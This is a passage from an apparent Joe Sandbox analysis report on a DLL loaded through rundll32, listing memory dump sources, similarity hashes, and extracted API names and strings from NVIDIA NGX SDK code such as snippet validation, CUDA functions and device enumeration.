                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2cc839d04e98489f5785c243189da5071302b04d50697954c13b85449f380218
                                                                                                                                  • Instruction ID: 1aa970d268c5a9506acf7b884e6f5551e57b0fe159021f06649498a702d1e2e8
                                                                                                                                  • Opcode Fuzzy Hash: 2cc839d04e98489f5785c243189da5071302b04d50697954c13b85449f380218
                                                                                                                                  • Instruction Fuzzy Hash: 2E21E2177385B004FBB58729B071F367AE4DBA97C0F81B032A9AC86E95E91FD1008F50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54df61bbafd376e8f1349e4aa377f4626598ae86d2b6d09b37910e7bb908dfc3
                                                                                                                                  • Instruction ID: e774bcdeb01abe9890ccc3d75d52ed139615c4862c7338a72fe28de909ae2d04
                                                                                                                                  • Opcode Fuzzy Hash: 54df61bbafd376e8f1349e4aa377f4626598ae86d2b6d09b37910e7bb908dfc3
                                                                                                                                  • Instruction Fuzzy Hash: 7D21C4167385B005FBB58739A071F366BE4DBA97C0F85B036A9EC86E99D91FD1008F50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1b80b68e5dd364e73026a90a475cf71157328046318175a845d3ce06da6f58cb
                                                                                                                                  • Instruction ID: fb3628deb2c2f5f0741d155448c8ef844362abe61c8f7e863886313beb4aa02b
                                                                                                                                  • Opcode Fuzzy Hash: 1b80b68e5dd364e73026a90a475cf71157328046318175a845d3ce06da6f58cb
                                                                                                                                  • Instruction Fuzzy Hash: 5B21F7167385B404F7B5C729A071F36ABE4CBA57C0F85B032A9EC86E99D91FE1004F90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d22dcfe589e8c01c3f41f9e7089e02a84077e88ee6fb0419a19f3df6f0fa83db
                                                                                                                                  • Instruction ID: 50724cdb3445704d427e653b6e72545ac12aaafde2de72f033b94e012782ff9d
                                                                                                                                  • Opcode Fuzzy Hash: d22dcfe589e8c01c3f41f9e7089e02a84077e88ee6fb0419a19f3df6f0fa83db
                                                                                                                                  • Instruction Fuzzy Hash: DC21B2567385B005FBB58729A0B1F366AE4DBA9780F85B036A9EC86E95D91FD1008F40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5798ec334a053781109db09298cdf5c74ce0122d0cdb0029b205978c3d608479
                                                                                                                                  • Instruction ID: c5af372f2572f441cd87641a62266f72ed17d3f758ba802c22e75fa097bcd5ad
                                                                                                                                  • Opcode Fuzzy Hash: 5798ec334a053781109db09298cdf5c74ce0122d0cdb0029b205978c3d608479
                                                                                                                                  • Instruction Fuzzy Hash: D021C4167385F005F7B58729A071F367AE4DBA97C0F85B036A9EC86E99E91FD1008F40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 85f2e8bf58d4f9b64b6909151b7aaee07ef0dbfdd006b4a9d11aa2e138a8a396
                                                                                                                                  • Instruction ID: a6e1bec0a861bb6ab4bdacdeb170e71cfb22c02ff462eabb4d03c18344fa35a6
                                                                                                                                  • Opcode Fuzzy Hash: 85f2e8bf58d4f9b64b6909151b7aaee07ef0dbfdd006b4a9d11aa2e138a8a396
                                                                                                                                  • Instruction Fuzzy Hash: 4521E5167385B404F7B5C72AA071F36ABE5C7A97C0F45B032A9AC86E95D81FD1004F90
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                                  • String ID: API 0x%X Snippet 0x%X$C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$Driver %d.%d Snippet expects at least %d.%d$GPU architecture 0x%X Snippet 0x%X$NGXValidateSnippet$NVSDK_NGX_GetAPIVersion$NVSDK_NGX_GetApplicationId$NVSDK_NGX_GetDriverVersion$NVSDK_NGX_GetGPUArchitecture$NVSDK_NGX_GetSnippetVersion$Snippet v%d.%d.%d Embedded app Id %07llX (%llu)$Validating snippet %s$error: failed to map functions in snippet %llX %llX %llX %llX %llX$error: snippet is using newer GPU arch %X > %X$error: snippet is using newer driver %d.%d > %d.%d
                                                                                                                                  • API String ID: 3859505661-3432153555
                                                                                                                                  • Opcode ID: ebab20289175742657cb254453a1aac9461496721fed0af0875b94e90ca3d93f
                                                                                                                                  • Instruction ID: c09c24c616d744925bda8b79ac87721bb14292ddc0496e038c224481e8b77a3c
                                                                                                                                  • Opcode Fuzzy Hash: ebab20289175742657cb254453a1aac9461496721fed0af0875b94e90ca3d93f
                                                                                                                                  • Instruction Fuzzy Hash: AD918172B08A8696E730CF90F8702AA73A8FB88B95F404136E94E63B54DF7CD505D700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID: : $/nvsdk_ngx.log$C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_cuda_lib.cpp$CUDA Error At Line : $NVSDK_NGX_CUDA_CreateFeature$NVSDK_NGX_CUDA_EvaluateFeature$NVSDK_NGX_CUDA_GetParameters$NVSDK_NGX_CUDA_GetScratchBufferSize$NVSDK_NGX_CUDA_Init$NVSDK_NGX_CUDA_ReleaseFeature$NVSDK_NGX_CUDA_Shutdown
                                                                                                                                  • API String ID: 190572456-1838268342
                                                                                                                                  • Opcode ID: 80f8c14052652433341928b27793310e1be3c036478b4425c63c4efd2ad57d16
                                                                                                                                  • Instruction ID: 51d6dac6a82bc1e9bfa7fa9fa6339074b25ce01446ab851f8b42b9905e6e4f17
                                                                                                                                  • Opcode Fuzzy Hash: 80f8c14052652433341928b27793310e1be3c036478b4425c63c4efd2ad57d16
                                                                                                                                  • Instruction Fuzzy Hash: 98715B24B19A8281FA30DF95F8743B963A8BF88781F485135E98D57765EFBCE441E380
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$Free$AddressAllocProc$ConditionInfoMaskVerifyVersion
                                                                                                                                  • String ID: D3DKMTEnumAdapters2$D3DKMTEnumAdapters3$D3DKMTQueryAdapterInfo$NVDA$\SystemRoot\system32\$gdi32.dll
                                                                                                                                  • API String ID: 698622721-2155789793
                                                                                                                                  • Opcode ID: d4a589c3a0a5bf55228324b5aad85beed0ea77cbd582812984007bf09c3c7f7e
                                                                                                                                  • Instruction ID: 8f8ee6c8c8c3522bee2c7a74a545387710063955807f7e671670ece23ef4450b
                                                                                                                                  • Opcode Fuzzy Hash: d4a589c3a0a5bf55228324b5aad85beed0ea77cbd582812984007bf09c3c7f7e
                                                                                                                                  • Instruction Fuzzy Hash: 74A14A26B19B4285FB60DFE5E8A02B933A9BF48789F414139CA0E93B54EF7DE414C354
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastLocal$Free$AllocAttributesFile$ConditionInfoMaskVerifyVersion
                                                                                                                                  • String ID: \SystemRoot\system32\$system32\
                                                                                                                                  • API String ID: 3315302763-552109975
                                                                                                                                  • Opcode ID: 60289b2349a9eb0fe14bb5c2bf18d3853dafc44cbd9ad55d42797f911690d958
                                                                                                                                  • Instruction ID: e351e7e24f057f82e5fe78fb44a2ab3a0628333672653eff7acb51f74148b0f7
                                                                                                                                  • Opcode Fuzzy Hash: 60289b2349a9eb0fe14bb5c2bf18d3853dafc44cbd9ad55d42797f911690d958
                                                                                                                                  • Instruction Fuzzy Hash: 8B51E521F0D60345FA766BE2A4B01796395AF46BD2F080738ED4E07BD1EFAEE4408B10
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$ErrorFreeLast$AllocAttributesFile
                                                                                                                                  • String ID: \SystemRoot\system32\$system32\
                                                                                                                                  • API String ID: 544983162-552109975
                                                                                                                                  • Opcode ID: 730c387bfeee172c065cf2142a85f4546424462d022ed5fe7a70941d72ad0581
                                                                                                                                  • Instruction ID: 1c7d87ab6cad788fbbb713ed21df896e947c7fdfb9360815abeff92000b77ab5
                                                                                                                                  • Opcode Fuzzy Hash: 730c387bfeee172c065cf2142a85f4546424462d022ed5fe7a70941d72ad0581
                                                                                                                                  • Instruction Fuzzy Hash: 3C51D661B0C64346FE74AFE2A47117963A4AF45BA2F480638DD5E07BD5EFBDE4188340
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorLastProc$FreeLibraryLoadLocal
                                                                                                                                  • String ID: $SYSTEM\CurrentControlSet\Control\Class\$SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                                                                                  • API String ID: 3750011226-2686055259
                                                                                                                                  • Opcode ID: 1dd6ce100cb580621a57aaa50faa47175d63362c2ce38f709ce9a83d8e805fc4
                                                                                                                                  • Instruction ID: e8c03c198e289bfc91957b6d5a852c21026eba2a72017343e8c05abc7aa39ce2
                                                                                                                                  • Opcode Fuzzy Hash: 1dd6ce100cb580621a57aaa50faa47175d63362c2ce38f709ce9a83d8e805fc4
                                                                                                                                  • Instruction Fuzzy Hash: 2E511E25B09B8286FA719F92B8742AA73E8BF89791F480039DE4D57B54EF7DE4049700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID: C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_lib.cpp$FullPath$Loaded NGXCore from path (%S)$NGXCore not found next to the application$NGXLoadSigned$NGXLoadSignedFromPath$NGXPath$SOFTWARE\NVIDIA Corporation\Global\NGXCore$System\CurrentControlSet\Services\nvlddmkm\NGXCore$\nvngx.dll$error: failed to load %S$error: failed to locate NGX core path via registry key - error %l$warning: unable to find filename for the application
                                                                                                                                  • API String ID: 514040917-3979418977
                                                                                                                                  • Opcode ID: f4d2a229c56032707af2cf9942862fa793be9a46e9b9c06362997328e222db2a
                                                                                                                                  • Instruction ID: e551b0073be0a8d42f0a4a2f2cc2601d152bf07ecac1720386ac2747e9f2c1d3
                                                                                                                                  • Opcode Fuzzy Hash: f4d2a229c56032707af2cf9942862fa793be9a46e9b9c06362997328e222db2a
                                                                                                                                  • Instruction Fuzzy Hash: 75515F31B1DA4792FA74DF90E8602EA2369FF84751F801136E94E53AA5EF7CE509D380
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                  • String ID: %s: Invalid input file or NULL encoder params$%s: Total Frames generated - %x for %x Image transcode object$%s: Cannot allocate transcode object$%s: CoInitializeEx failed with %x error$%s: MFStartup : MF initialization failed with %x error$%s: Total Frames generated - %d for %x video transcode object$%s: Transcode initialized for Image media type with %x object$%s: Transcode initialized for video media type with %x object$0$InitializeApp$Transcode
                                                                                                                                  • API String ID: 3442037557-3066126349
                                                                                                                                  • Opcode ID: 81151dc22e6085f7dcf4099bdfb8c54fe29bf8f3d460ed9fe7c7e9b300c8df07
                                                                                                                                  • Instruction ID: 39014aa6ae9ae216aa32d3c13dc433ab6fe91b91599c44db6a220cbec540037a
                                                                                                                                  • Opcode Fuzzy Hash: 81151dc22e6085f7dcf4099bdfb8c54fe29bf8f3d460ed9fe7c7e9b300c8df07
                                                                                                                                  • Instruction Fuzzy Hash: 3CB14F71708B4286F7A0CF96E89066977A9FB88781F50413AEB8D93B94DF7DE440CB40
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
                                                                                                                                  • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInfo$SetupDiGetClassDevsW$SetupDiGetDeviceInterfaceDetailW$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                                                                                  • API String ID: 576420853-2811369298
                                                                                                                                  • Opcode ID: e36274d5b006de419470d65754a9c31c6c642be75edc98a9d974be8a120309cb
                                                                                                                                  • Instruction ID: 28388dfaf8cec13395af9fc7e4dd8edf1be19c2989ede713cabbcccba651a44f
                                                                                                                                  • Opcode Fuzzy Hash: e36274d5b006de419470d65754a9c31c6c642be75edc98a9d974be8a120309cb
                                                                                                                                  • Instruction Fuzzy Hash: 32A19926B09B8285FB34DF95F8A423933A8FB48B91F45413AD96D937A4EF7DE0409344
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$Free$ConditionMask$FullNamePath$AddressAllocInfoLibraryLoadProcVerifyVersion
                                                                                                                                  • String ID: $$&$*
                                                                                                                                  • API String ID: 828358482-3416282258
                                                                                                                                  • Opcode ID: 5729eadd254e398a79da1de9597fab71f461e464946d20159106587438328c11
                                                                                                                                  • Instruction ID: 4775745869bc505484dbf9bf3be84e7f981c8cf2551b826c0af4fc4f24f8cd44
                                                                                                                                  • Opcode Fuzzy Hash: 5729eadd254e398a79da1de9597fab71f461e464946d20159106587438328c11
                                                                                                                                  • Instruction Fuzzy Hash: C341ACB2B0968286FB309F92B97427567A4FF89794F044238CA4E97BA0DF7DE4418740
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$File$AttributesCloseCreateHandleLibraryLoad
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 3653152856-336475711
                                                                                                                                  • Opcode ID: bbbf8b0cfe091933c39af1670c220df65eed86bdcb4e0475fc3e254f7dabdbc7
                                                                                                                                  • Instruction ID: 190c892bbd5e81f692fb4f5c81fc73a62367a7efc52e30d7344eb8e91649e643
                                                                                                                                  • Opcode Fuzzy Hash: bbbf8b0cfe091933c39af1670c220df65eed86bdcb4e0475fc3e254f7dabdbc7
                                                                                                                                  • Instruction Fuzzy Hash: AC411662F0875242FF754FA6A5A013962D4AF84BE6F444239DE5E12FE4DF7CE8468700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: 9f186a2e040995e6f0b0e64b1a87cd653ec6994900668234fa6fa4513ef19a1e
